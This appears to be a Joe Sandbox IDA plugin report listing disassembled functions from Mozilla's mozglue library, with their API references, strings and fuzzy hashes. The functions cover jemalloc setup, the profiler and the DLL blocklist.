Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 68651cb81fc941b8a5e66e32f65a5aff7c7f4abbe2ea9c1b50350b554f94f710
Instruction ID: 439ce405d8196d12364a4d4d53b7a320fc5948234830c863a1935b6e843fed23
Opcode Fuzzy Hash: 68651cb81fc941b8a5e66e32f65a5aff7c7f4abbe2ea9c1b50350b554f94f710
Instruction Fuzzy Hash: 7F518171E00219DFDF14CFA8D9C1ADEBBBAEF88714F544229E911B7200D734AD818B91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA98AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA8FA80: GetCurrentThreadId.KERNEL32 ref: 6BA8FA8D
Part of subcall function 6BA8FA80: AcquireSRWLockExclusive.KERNEL32(6BADF448), ref: 6BA8FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98CBA
free.MOZGLUE(?), ref: 6BA98CCF

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: b0b0a8cae0ca3b310b8060d9f4733328b77279dd59f59bfb14b544f52a93165b
Instruction ID: 81974de7847b31a82bcf609403a28dace304457c7bf6ff4678623135a835b61e
Opcode Fuzzy Hash: b0b0a8cae0ca3b310b8060d9f4733328b77279dd59f59bfb14b544f52a93165b
Instruction Fuzzy Hash: 9B71AF75A14B008FCB04DF29D58061AB7F1FF88314F058A9EE9999B762E774E8C0CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6BA5F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6BA5F2F0
NtQueryVirtualMemory.NTDLL ref: 6BA5F308
RtlNtStatusToDosError.NTDLL ref: 6BA5F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BA5F371

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: a80a990fb0f9c1bbbd2581fc833328e1bf5dcf3e453afd79f0b489d4b9268807
Instruction ID: e2df854b587d82602cb5da40c977e422a18734a0a4a00840ca583963dfb16a71
Opcode Fuzzy Hash: a80a990fb0f9c1bbbd2581fc833328e1bf5dcf3e453afd79f0b489d4b9268807
Instruction Fuzzy Hash: 6B218F72A01308ABFF108A61CD55BEB77B8AB44368F14422DE43096180D7BE9BD4C761

Uniqueness

Uniqueness Score: -1.00%

Function 6BAC53C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6BAC86AE

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: 0e198f5c70508f58c1cecd8a82d1fea92feb2f4204f99b09fd75b8d3d65f7eb5
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: 06C1A472A0011A8FCF14CF68CD91BEAB7B2EF85314F1902A9D549EB345D734A9C5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BAC50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6BAC8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6BAC925C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 383c35dbc3d5a9e7037d79eb70de80fb8081cc01a64c3bf82cdb2cc2e20c5c53
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: BDA1C572A002168FCF14CF68CD817AAB7B2AF95314F1902B9C949EB385D734A9D5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA7A93

Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BAA7AA1

Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6BAA7B31

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 2f0de83995d2d0121906f79f061ed14ec4564cf3664fb563bce263c4d75e2c38
Instruction ID: 8c516a8d060fd2b98f827726d127464229902b32b4bfc329484eb0d1270d0614
Opcode Fuzzy Hash: 2f0de83995d2d0121906f79f061ed14ec4564cf3664fb563bce263c4d75e2c38
Instruction Fuzzy Hash: 53B1BC356083808BCF25CF24C15065FF7E2AFC9314F194A5CE99667394DB78E986CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BABB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BA603D4,?), ref: 6BABB955
NtQueryVirtualMemory.NTDLL ref: 6BABB9A5

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: ad12734260eefa6b550a0051f6e8a11ba9d59605df5fd7f30d9cd390d880f1b6
Instruction ID: 77ca0f02179eea4c678bb4912912309a6188739b33d8333112c2433d4d2c28a9
Opcode Fuzzy Hash: ad12734260eefa6b550a0051f6e8a11ba9d59605df5fd7f30d9cd390d880f1b6
Instruction Fuzzy Hash: 2441EB71E002199FDF04CFA9D9C15DEB7BAEFC8354F548129D415A7344EB35A885CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BA619A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BADF760), ref: 6BA619BD
GetCurrentProcess.KERNEL32 ref: 6BA619E5
GetLastError.KERNEL32 ref: 6BA61A27
moz_xmalloc.MOZGLUE(?), ref: 6BA61A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BA61A4F
GetLastError.KERNEL32 ref: 6BA61A92
moz_xmalloc.MOZGLUE(?), ref: 6BA61AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BA61ABA
LocalFree.KERNEL32(?), ref: 6BA61C69
free.MOZGLUE(?), ref: 6BA61C8F
free.MOZGLUE(?), ref: 6BA61C9D
CloseHandle.KERNEL32(?), ref: 6BA61CAE
ReleaseSRWLockExclusive.KERNEL32(6BADF760), ref: 6BA61D52
GetLastError.KERNEL32 ref: 6BA61DA5
GetLastError.KERNEL32 ref: 6BA61DFB
GetLastError.KERNEL32 ref: 6BA61E49
GetLastError.KERNEL32 ref: 6BA61E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA61E9B

Part of subcall function 6BA62070: LoadLibraryW.KERNEL32(combase.dll,6BA61C5F), ref: 6BA620AE
Part of subcall function 6BA62070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BA620CD
Part of subcall function 6BA62070: __Init_thread_footer.LIBCMT ref: 6BA620E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA61F15
VerSetConditionMask.NTDLL ref: 6BA61F46
VerSetConditionMask.NTDLL ref: 6BA61F52
VerSetConditionMask.NTDLL ref: 6BA61F59
VerSetConditionMask.NTDLL ref: 6BA61F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA61F6D

Strings

D, xrefs: 6BA61B57

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: ef0c8a7a6b330ea318be418a0c6a409ee5e484c7e1bac3499c6b3a8ead167dc5
Instruction ID: 383fc466a3624a466ba5f70fcdfd850939bc307ef4fdc7a663f1961c65da6c2b
Opcode Fuzzy Hash: ef0c8a7a6b330ea318be418a0c6a409ee5e484c7e1bac3499c6b3a8ead167dc5
Instruction Fuzzy Hash: F4F16EB1D44325AFEF209F65CD48BAABBB4FF49740F044199E905A7240E778DE81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA7BB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6BA7BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6BA7BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BA7BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA7BE33
VerSetConditionMask.NTDLL ref: 6BA7BE65
VerSetConditionMask.NTDLL ref: 6BA7BE71
VerSetConditionMask.NTDLL ref: 6BA7BE7D
VerSetConditionMask.NTDLL ref: 6BA7BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA7BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BA7BEE4
VerSetConditionMask.NTDLL ref: 6BA7BF15
VerSetConditionMask.NTDLL ref: 6BA7BF21
VerSetConditionMask.NTDLL ref: 6BA7BF2D
VerSetConditionMask.NTDLL ref: 6BA7BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA7BF47

Part of subcall function 6BABAAE0: GetCurrentThreadId.KERNEL32 ref: 6BABAAF8
Part of subcall function 6BABAAE0: EnterCriticalSection.KERNEL32(6BADF770,?,6BA7BF9F), ref: 6BABAB08
Part of subcall function 6BABAAE0: LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB6B

free.MOZGLUE(00000000), ref: 6BA7BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BA7C014

Part of subcall function 6BABAC20: CreateFileW.KERNEL32 ref: 6BABAC52
Part of subcall function 6BABAC20: CreateFileMappingW.KERNEL32 ref: 6BABAC7D
Part of subcall function 6BABAC20: GetSystemInfo.KERNEL32 ref: 6BABAC98
Part of subcall function 6BABAC20: MapViewOfFile.KERNEL32 ref: 6BABACB0
Part of subcall function 6BABAC20: GetSystemInfo.KERNEL32 ref: 6BABACCD
Part of subcall function 6BABAC20: MapViewOfFile.KERNEL32 ref: 6BABAD05
Part of subcall function 6BABAC20: UnmapViewOfFile.KERNEL32 ref: 6BABAD1C
Part of subcall function 6BABAC20: CloseHandle.KERNEL32 ref: 6BABAD28
Part of subcall function 6BABAC20: UnmapViewOfFile.KERNEL32 ref: 6BABAD37
Part of subcall function 6BABAC20: CloseHandle.KERNEL32 ref: 6BABAD43

Part of subcall function 6BABAE70: GetCurrentThreadId.KERNEL32 ref: 6BABAE85
Part of subcall function 6BABAE70: EnterCriticalSection.KERNEL32(6BADF770,?,6BA7C034), ref: 6BABAE96
Part of subcall function 6BABAE70: LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,6BA7C034), ref: 6BABAEBD

Strings

LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BA7BDDD
accelerator.dll, xrefs: 6BA7BC8E, 6BA7BC9D
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BA7BFCF
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BA7BF5B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: b7e00b90c0202194e0bc403ae93ff2fc54beccf95fe35e462d92e32974a9bd5e
Instruction ID: a0a13aae6935ba05ee4c2f472cd105f02e9a328c14f7dbc6f7c25c303a0c4d89
Opcode Fuzzy Hash: b7e00b90c0202194e0bc403ae93ff2fc54beccf95fe35e462d92e32974a9bd5e
Instruction Fuzzy Hash: 11E109B5A0C300ABDF209F28C955B5EB7E5EF85704F448A3DE88587281DB78E9C5C792

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA97090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6BA9B9F1,?), ref: 6BA97107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9E92D
GetCurrentThreadId.KERNEL32 ref: 6BA9EA4F
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EA5C
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EA80
GetCurrentThreadId.KERNEL32 ref: 6BA9EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9EA92
GetCurrentThreadId.KERNEL32 ref: 6BA9EB11
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BA9EB3C
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB5B

Part of subcall function 6BA95710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6BA9EB71), ref: 6BA957AB

Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
CloseHandle.KERNEL32(?), ref: 6BA9EC55
free.MOZGLUE(00000000), ref: 6BA9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BA9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: fe83bc41f96ef55df4d4cd2e2bb12bda6eacb6d2a8aa95a5b35386db709544f1
Instruction ID: 0e920886406acc48257771c5621b8c3f2870d11546f2278875b51d24e24cc5fe
Opcode Fuzzy Hash: fe83bc41f96ef55df4d4cd2e2bb12bda6eacb6d2a8aa95a5b35386db709544f1
Instruction Fuzzy Hash: 95A134706143049FCF10AF28E984B6A77E5FFC6714F18812DE91987652DB39D886CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA64180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BA64196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BA641F1
VerSetConditionMask.NTDLL ref: 6BA64223
VerSetConditionMask.NTDLL ref: 6BA6422A
VerSetConditionMask.NTDLL ref: 6BA64231
VerSetConditionMask.NTDLL ref: 6BA64238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BA64245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BA64263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BA6427A
FreeLibrary.KERNEL32(?), ref: 6BA64299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6BA642C4
VerSetConditionMask.NTDLL ref: 6BA642F6
VerSetConditionMask.NTDLL ref: 6BA64302
VerSetConditionMask.NTDLL ref: 6BA64309
VerSetConditionMask.NTDLL ref: 6BA64310
VerSetConditionMask.NTDLL ref: 6BA64317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6BA64324

Strings

Shcore.dll, xrefs: 6BA6425E
SetProcessDpiAwareness, xrefs: 6BA64274

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 680ce750bdccd412b020f8caf351a3189fd3594cade44ca28a125c152bfeb05b
Instruction ID: a6116883b19e2db1d81e0d7f4826ee3907cf74c7dac5d316e3665e04cb1cfff3
Opcode Fuzzy Hash: 680ce750bdccd412b020f8caf351a3189fd3594cade44ca28a125c152bfeb05b
Instruction Fuzzy Hash: 1451E2B1A443146BEF106B758C59BAFB768EF86B50F058618F9059B1C0EF78D981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA8D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BADE804), ref: 6BA8D047
GetSystemInfo.KERNEL32(?), ref: 6BA8D093
__Init_thread_footer.LIBCMT ref: 6BA8D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6BADE810,00000040), ref: 6BA8D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE7B8,00001388), ref: 6BA8D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE744,00001388), ref: 6BA8D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE784,00001388), ref: 6BA8D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE7DC,00001388), ref: 6BA8D1B1

Strings

<jemalloc>, xrefs: 6BA8D268, 6BA8D311
Compile-time page size does not divide the runtime one., xrefs: 6BA8D26D
: (malloc) Unsupported character in malloc options: ', xrefs: 6BA8D322
MOZ_CRASH(), xrefs: 6BA8D277
MALLOC_OPTIONS, xrefs: 6BA8D0CB

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: b86a493fefd799325a3825b8933f28f7f618547c28bde7fa605970b9fce4589e
Instruction ID: f99fece6b599f248b040a99b73527ec44e1bcc5ef8233a44a4567e657a4ed2f6
Opcode Fuzzy Hash: b86a493fefd799325a3825b8933f28f7f618547c28bde7fa605970b9fce4589e
Instruction Fuzzy Hash: 6281E570A98300AFEF009F68C944B69B7F5FB86704F14816FE9819BB80D779D882CB51

Uniqueness

Uniqueness Score: -1.00%

